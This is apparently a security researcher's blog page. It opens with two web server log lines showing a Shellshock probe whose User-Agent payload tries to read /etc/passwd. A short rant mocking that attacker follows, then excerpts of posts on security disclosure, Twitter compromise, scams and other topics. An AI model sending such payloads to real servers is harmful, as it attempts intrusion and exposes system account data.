85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"
Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
Category: Rants
Stop. Just stop.
In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real”…
So your Twitter has been hacked. Now what?
So I’m getting a lot of Twitter spam with links to install bad crap on my computer. More than just occasionally, these DMs are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions. So what do you need to do? Simple. Follow these basic NIST…
El Reg and the troubling case of climate denialism
This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites. Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate…
Infosec apostasy
I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security: Those who aim via various usual suspects to protect things Those who aim via various often…
Marketing – first against the wall when the revolution comes
A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call. *Click* As a consumer, you must hang up to avoid being scammed. End of story. No exceptions. Even if the business has a relationship…
Responsible disclosure failed – Apple ID password reset flaw
Responsible disclosure is a double-edged sword. The Faustian bargain is I keep my mouth shut to give you time to fix the flaws, not ignore me. I would humbly suggest that it is very relevant to your interests when a top security researcher submits a business logic flaw to you that is trivially exploitable…
PTV iPhone app – worst public transport app ever, or just pure evil?
I take the train between Marshall and Southern Cross Station, a terminus station with 14 or 15 platforms and hundreds of V/Line country, suburban and bus services daily. I had an app that worked (the old MetLink app). That wasn’t stellar, but it worked well enough that I didn’t need to get a paper timetable…
Shame, Slashdot, Shame – misogyny and moderation
Our industry suffers from a lack of women – women in senior positions are very rare, women who do what I do I can count on my hands without resorting to binary, and there are so few women coming out of Uni comp sci, developers and engineering courses that I can use and craft into…
Political expediency
Last week, Julia Gillard listened to Clubs Australia and the few voters out at Rooty Hill RSL rather than do the right thing and fix problem gambling. In her announcement, she used the code word “gaming”, which is industry speak that doesn’t like to be called “gambling”. By using this special phrase, it’s obvious that for-profit…